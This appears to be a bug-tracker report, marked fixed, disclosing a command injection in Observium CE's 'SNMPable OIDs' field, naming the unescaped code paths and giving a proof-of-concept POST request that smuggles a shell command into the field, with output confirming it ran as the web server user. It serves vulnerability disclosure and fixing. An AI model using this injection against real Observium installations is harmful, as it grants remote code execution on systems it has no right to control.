Details
-
Bug
-
Resolution: Fixed
-
Major
-
None
-
CE-22.5
-
None
Description
Version Tested : Observium CE 26.1.14545
-
-
- Summary
The "SNMPable OIDs" field on Add Device (and Edit Device -> SNMP) gets fed into a shell command with no escaping at all. Anyone who can reach that field can run arbitrary commands as the web server user.
- Summary
-
-
-
- Details
`snmp_translate()` in `includes/snmp.inc.php` builds an `snmptranslate` command line. It splits the input on `::` to get a MIB name and an OID (line ~653), then does:
- Details
-
```php
$cmd .= ' -m ' . $mib; // line ~687 - no escaping
```
and later:
```php
$cmd .= ' \'' . $oid . '\''; // line ~698 - hand-rolled quoting, not escapeshellarg()
```
That command then runs through `external_exec()` in `includes/common.inc.php`, which does `proc_open('exec ' . $command, ...)`.
-
-
- PoC
Tested against a local Docker copy of the app, logged in as Admin with a valid CSRF token:
- PoC
-
```
POST /index.php?_=1
page=addhost
submit=save
hostname=cmdinjtest2.local
requesttoken=<session csrf token>
snmp_version=v2c
snmp_transport=udp
snmp_community=public
snmpable=$(touch${IFS}/tmp/pwned_cmdinj_http)::1
```
The app itself just shows "Invalid or unknown OID" error - but inside the container:
```
rw-rr- 1 www-data www-data 0 Jul 7 09:15 /tmp/pwned_cmdinj_http
```
File's there, owned by `www-data` - the web server user. `${IFS}` stands in for a space because the app splits the field on spaces before this ever reaches the vulnerable code; it's not bypassing any security check, just working around that split.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (8.8, High)
-
-
- Impact
Remote code execution as the web server (or poller) process. Reachable by a full Admin through Add Device, or by anyone who's been handed write access to a single device through Edit Device.
- Impact
-
